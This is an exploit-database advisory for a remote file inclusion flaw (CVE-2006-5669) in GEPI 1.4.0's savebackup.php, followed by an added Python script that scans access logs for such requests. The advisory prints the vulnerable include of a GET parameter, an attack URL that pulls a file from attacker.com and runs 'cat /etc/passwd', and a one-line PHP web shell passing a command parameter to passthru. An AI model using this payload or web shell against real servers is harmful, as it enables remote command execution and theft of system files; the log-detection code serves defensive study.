GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion
Author: Sumit Siddharth
type: webapps
platform: php
date_added: 2006-10-30
date_updated: 2016-09-14
verified: 1
codes: OSVDB-32631;CVE-2006-5669
application_url: http://www.exploit-db.comgepi-1.4.0.tar.gz
raw file: 2692.txt

Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..

vulnerable code:-
include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat /etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:- $um$id

# milw0rm.com [2006-10-31]
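
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to savebackup.php whose filename parameter carries a URL or network path instead of a local file name. The combined log format, the function name suspicious_requests and the sample log lines (constructed) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

TARGET_SUFFIX = "/gestion/savebackup.php"  # script named in the advisory
PARAM = "filename"                         # value that reaches include()

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with "scheme:" (two or more characters, so a Windows
# drive letter such as C: is not flagged), "//" or a UNC "\\" prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def suspicious_requests(lines):
    """Return (client_ip, decoded_value) for each request to the vulnerable
    script whose filename parameter points at a remote resource."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not unquote(target.path).endswith(TARGET_SUFFIX):
            continue
        # parse_qsl percent-decodes once, matching what PHP puts in $_GET.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == PARAM and REMOTE_RE.match(value):
                hits.append((line.split()[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges, reserved host names).
SAMPLE_LOG = [
    '198.51.100.7 - - [31/Oct/2006:10:12:01 +0000] "GET /gepi/gestion/savebackup.php?filename=http://remote.example/test.txt&cmd=id HTTP/1.1" 200 512',
    '198.51.100.7 - - [31/Oct/2006:10:12:09 +0000] "GET /gepi/gestion/savebackup.php?filename=hTTp%3A%2F%2Fremote.example%2Ftest.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [31/Oct/2006:10:15:44 +0000] "GET /gepi/gestion/savebackup.php?filename=backup_2006-10-30.sql HTTP/1.1" 200 88213',
    '192.0.2.10 - - [31/Oct/2006:10:16:02 +0000] "GET /gepi/login.php?next=http://intranet.example/ HTTP/1.1" 200 1040',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} requested remote include: {value}")
```

Only the first two sample lines are reported; the local backup name and the unrelated login.php request are ignored.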